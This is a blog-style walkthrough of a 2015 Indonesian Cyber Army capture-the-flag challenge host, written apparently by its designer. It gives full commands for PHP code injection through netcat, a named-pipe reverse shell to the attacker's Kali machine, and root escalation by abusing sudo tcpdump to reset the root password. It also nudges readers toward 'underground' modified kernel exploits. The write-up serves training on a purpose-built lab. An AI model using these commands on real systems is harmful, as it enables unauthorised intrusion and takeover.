Hello People,
Its been a while I’ve updated my blog, this blog write up is for the recent ICA Event ( Indonesian Cyber Army ) that held on 1st and 2nd October 2015 in Bali, Indonesia.
I got to admit something, Bali is so Good…. nice people, nice food, nice beach , nice clubs and many more nice things…..
I miss Bali….  🙂

This is a walk-through for CTF Competition. Let dig in:

Firstly you need to understand the Design of the CTF, as per the picture below:

As you can see the diagram, each team have 3 members, and there is Pitboss System named Master and a Live telecast on the projector showing the results.
Each team have to run a specially designed Virtual Image called “THOST”  a.k.a Target Host , this Target Host is a Customized RHEL 6.4 with some vulnerability, On the day of the event,
each team been given a copy of THOST.

To run the THOST, there is some requirement:
1) THOST is a VMware Workstation Image, therefore, you required to have Vmware Workstation.
2) THOST require a Password to start and a CODE to configure.
3) THOST required active Network connection to Master System.
4) THOST is not available for Download, its been given to each team participated in ICA CTF Bali 2015.

Some of the participants asked me to give them the master system, I’m truly sorry, I can’t do that, and actually, you don’t really need the master system to run for practice.

To Perform a self practice, firstly, make sure you meet the requirements:
1) An x86_64 class Laptop/Desktop. ( Macbook also accepted  )
2) Windows 7 or Windows 8 64bit. ( OSX Mavericks and Above )
3) Install latest VMWare Workstation  ( Vmware Fusion for Mac )
4) Minimum 4GB RAM.
5) Enough space for 2 VM [ Kali Linux and THOST ( less then 5GB)  ]

Then, Configure your 1st Image :
1) Create KALI Linux ( 2.0 ) Image in Vmware
2) Setup the Networking for Kali as Bridged in Vmware
3) Set IP address as 192.168.0.250/23 [ 255.255.254.0 ]
*** you came for a hacking competition, therefore, you should know how to setup Kali Linux.
*** if you don’t, you don’t deserve to be here ( seriously )

Next, Configure THOST :
1) Copy the THOST image from the DVD to your system
2) Start the THOST Image from VMware Application
3) The password to start the image is  “ica2015”

Steps to configure the THOST:
1) Once the THOST is started, you will be presented with Enter ICA Code

[Enter your assigned ICA Code ]
** The ICA code will set the IP address in the THOST.
** therefore, if your ICA Code is A22 , then your IP address would be 192.168.0.22/23(255.255.254.0)
** The A followed by a number is the code, the number represents your IP address for the THOST
** Make sure the NIC for THOST image is bridged, THOST will fail to start if it cannot ping 192.168.0.250 (Kali)

2) After the code is entered, you will get this output, there will be 7 flag created in this THOST, this flags are unique for each TEAM

[ 7 flag file and Random Admin Password for login ]

3) Then, immediately, you will get a prompt to restart,

[ Press K to restart the THOST system ]

4) Once the THOST restarts, it will prompt you to continue,

[ Enter C to continue boot ]

5) The THOST will self configure the IP address and Prepare all the vulnerability and will perform connection to IP 192.168.0.250/23
***it very critical for IP 192.168.0.250/23 to be in the network. ( in practice, the KALI Linux image has the IP 192.168.0.250 )
Once the configuration is done, you will get this out put.

[ Write down the Admin user name and password somewhere, as this is the only login allowed to login to THOST, press K to login ]

6)Login to the THOST with the username admin and the password it gave you.
*** root user account password is 16 char, randomly generated, therefore, even me have no idea, what is the root password.
*** Once you login, verify the IP address and make sure you can ping 192.168.0.250 and from Kali Linux, make sure you can Ping the THOST.

[ verify IP address and ping Kali Linux ]

For the rest of the walk through, we will assume
KALI LINUX IP = 192.168.0.250/23
THOST IP = 192.168.0.22/23 {ICA Code : A22}

—end of THOST config —-

If you manage to come up to this level, you are good to go to next level.
Next, we will dive into the Flags.

The main Objective of this ICA CTF is to capture the flags inside the THOST and upload to the flag server; |
the more flags you capture from more enemy, you will earn more points.
Since this is a practice, you are not required to upload the flag to flag server.
You just need to know how this flags can be captured.

Lets walk-through, The topics :

A) The scanning and ports open.
B) Vulnerability 1 [ user1 , user2 & user3 ]
C) Vulnerability 2 [ user cadlock and apache ]
D) Vulnerability 3 [user root escalation using sudo ]
E) Exploit to escalate to root [ upload exploit to root the system ]

A) The scanning and ports open

From your kali linux, you should perform a nmap to scan and see what are the Interesting Ports open
a nmap result would be like this:

[ nmap scan result ]

The result is very obvious , that very interesting TCP ports are open,
port  21 , 22 , 80 , 111  and 5666 is open.
As you should already know that port 21 is a FTP port, and 22 is ssh and 80 is Web,
so, as a hacker, you need to see what is interesting in this services.
recommended, you login to each services and perform a full reckon on what is available in each service.

B) Vulnerability 1

The first vulnerability is the FTP server, inside the FTP server, there is 20 files that been encoded, the clue is in the README file.
all you have to do is, download all the files from the FTP Server and decode and decrypt the files to reveal passwords and login information.

[ a simple ftp to THOST will reveal the README file and the clue is there ]

Next, use ftp command to download all the files into your Kali Linux

[ login as anonymous and download all .txt files ]

To decode the files, run

[ use md5sum to see which files are different, then run base64 -d ]

Once you get user1 password, you can login to THOST as user1 and capture the flag1 , as a hacker, you should see what else is open for access as user1 , if you look carefully, the directory
/home/apache have read access for others, therefore a bonus flag can be captured in /home/apache

[ ssh to THOST as user1 and get the flag1 and flag6 of apache user ]

Following up is, access to THOST as user2 and user3, user2 and user3 password are in the same file as the user1, but it been encrypted with AES 256 CBC and the password for user2 file been revealed in user1 decoded file, all you have to do next is, run

[ this reveals user2 password and encryption password for user3 ]

Next do the same for file number 3 to reveal user3 password

[ this reveals user3 password ]

Now you have user2 and user3 password to access the THOST
In summary, the README file resides in the FTP server, clearly states the status of all files…
1) all files are encoded  ( means: all files are encoded in base64 )
2) some files are encrypted and encoded ( means, there is 2 files encrypted with aes-256-cbc and then been encoded with base64 )
3) find the encoding and decode to reveal the clue
4) the clue will reveal the password to decrypt the enncrypted files
note**  all encryption standard are AES 256 CBC ( this means all encryption standard is AES-256-CBC, you should know that this standard will encrypt and encode with base64 )

So, the 2 files are double encoded.
Next, once you get the user2 and user3 password, you can login to THOST and get the flag2 and flag3.

The second vulnerability,

C) Vulnerability 2

Pretty much, with user1, user2 and user3, you already can get flag1 , flag2 , flag3, if you dig further, you can also get  flag5( cadlock )  and flag6 (apache ).
with user1, user2 and user3, you can access apache home directory and the web system directory , /var/www/html/ , the login.php is hard-coded with cadlock user password.
     
[ the 3 diagram shows, how you can get cadlock username and password to capture flag5 ]

Now, if you did not manage to get user1 , user2 or user3 passwords from the clue, there is 2nd vulnerability  in the web site running in THOST, the Cadlock Intranet Backup System.
You can get at least 2 flags from this method, flag5(cadlock)  and  flag6(apache).

The tools you should use is dirbuster to see what are the directory available in the website and attempt to bypass authentication to gain entry to that directory.

[ Run dirbuster against the THOST website to reveal what are the directory available ]

[ After scan, you will notice there is a directory called  logs and there is log_mon.php ]

Attempt to access http://<thost ip>/logs/log_mon.php

[ this is the page for log_mon.php, you access without authentication ]

If you read carefully, a clue been given here, that is, port UDP 1000 is receiving data and its written directly to this page.
As a hacker, you should see the opportunity here, you can post arbitrary php code to port UDP 1000 using netcat and attempt to execute that page with your code, solution :

    

As you can see the POC of typing text in netcat port 1000, gets into the page directly.
using this method, you can run a netcat session in Kali Linux and get THOST to spawn a shell for you. Solution :

Steps :
          

In summary : all you have to do is:

1) Once in netcat : run ( netcat THOST-IP -p 1000 ) and run this to insert the PHP code to the log_mon.php page
<?php echo exec($_GET[“cmd”]); ?>

2) Start a local netcat in KALI linux
nc -lvvp 1234

3) run in address
http://THOST/logs/log_mon.php?cmd=mknod /var/tmp/backpipe1 p

4)run in address
http://THOST/logs/log_mon.php?cmd=/bin/sh 0</var/tmp/backpipe7 | nc KALI-IP 1234 1>/var/tmp/backpipe1

5)run in the local netcat session : to spawn a SHELL
python -c ‘import pty; pty.spawn(“/bin/sh”)’

and there will a shell access to THOST as user apache….  🙂
You can cat the login.php file in /var/www/html/ to reveal cadlock password.

Moving on.

D) Vulnerability 3
This one is a bit tricky, but as a hacker, you should always think, once you gain entry to a system, what else you can do or find…
In that context, the flaw 3, is under user cadlock, if you login to THOST as user cadlock, you can run sudo -l , it will reveal that user cadlock been granted access to run tcpdump using sudo,
it may look totally legitimate command to run by user cadlock, but, there is a flaw in tcpdump command in Linux, go through the diagrams to see what would happen when you run tcpdump using some smart flags…  🙂

 

 

The steps is very straight forward:

1) echo $’echo pass | passwd root –stdin’ > /var/tmp/.runme  ( will create a file in /var/tmp/ with the command to reset root password )
2) chmod +x /var/tmp/.runme ( make the file executable )
3) sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /var/tmp/.runme -Z root  ( read man tcpdump to get the meaning of all the flags )

***THOST system will prevent writing to /tmp , therefore, you can write to /var/tmp
*** running tcpdump with that options, will invoke the runme file, where it will reset root password to pass
*** and you can reset  root with password pass to gain flag7(root) and flag4(admin)

E) Exploit to escalate to root

Finally, exploit ….. this is hard, one should master the C coding, assembly language, debuggers , Assemble Machine Language analysis. I seriously never hope any team to do this, but congratulations to Team from University of Indonesia to attempt the exploit. But… it failed… 🙂

Well, let me give an introduction on the exploit.

Exploit is a program that performs insertion of shellcode to memory that has some kind of bug, in this case RHEL 6.4 have a perf_event bug that documented in cve-2013-2094 , semtex.c.
The exploit semtex.c will open root shell and escalate to root from regular user. The mitigation step is to prevent perf_event handler in Kernel to run as a regular user, the THOST system is enabled with this workaround. Therefore , running the exploit from public source will be prevented.

Steps to download and run :
  

As you can see, running semtex.c failed, because the THOST system have prevented the perf_event handler in Kernel, the flag kernel.perf_event_paranoid=2 will prevent semtex.c exploit to run. This is a work around published in the CVE-2013-2094

But, the internet is a BIG Ocean, instead of using a publicly available exploit, you should get in touch with some underground exploit. Where, the publicly available exploit would be heavily modified to bypass any work around.

As a proof of concept, you may view the picture below:

[ the file semv3.tgz have the modified version of semtex.c ]

[ as you can see, the /etc/sysctl.conf still have kernel.perf_event_paranoid=2 enabled, but the modified version of semtex.c can escalate to root ]

*** to protect the original author of the modified version of semtex exploit, i cannot upload the semv3.tgz anywhere, but, if you work hard in the internet, you could find it from some site.

So… we are in the end, thank you for your interest in the CTF, hopefully, you understand the steps and all the vulnerability, this vulnerabilities are created by me, therefore, its not something you can find in the wild, its purely for ICA CTF Hacking event in Bali.

You may email me if you have any questions but under this condition:
1) I cannot give you the semv3.tgz file, don’t ask
2) I cannot teach you hacking, you have to teach yourself
3) There is no book, or referral for hacking, all they have is purely for education purposes.
4) I can be invited to do a Talk for your campus, if Accommodation and Travel expenses is covered ( Only for Indonesia ) 
5) I am NOT a hacker, I’m doing R&D for  FOResec ( Research and Development )

Thank You very Much. Until we meet again, “Good Hunting”
Special shout out for all the team members from STIKOM Bali to make this event a memorable for me.

“you wanna be a h@ck3r? then learn coding, coding in C, else you are considered a script kiddie”  –  $73v^en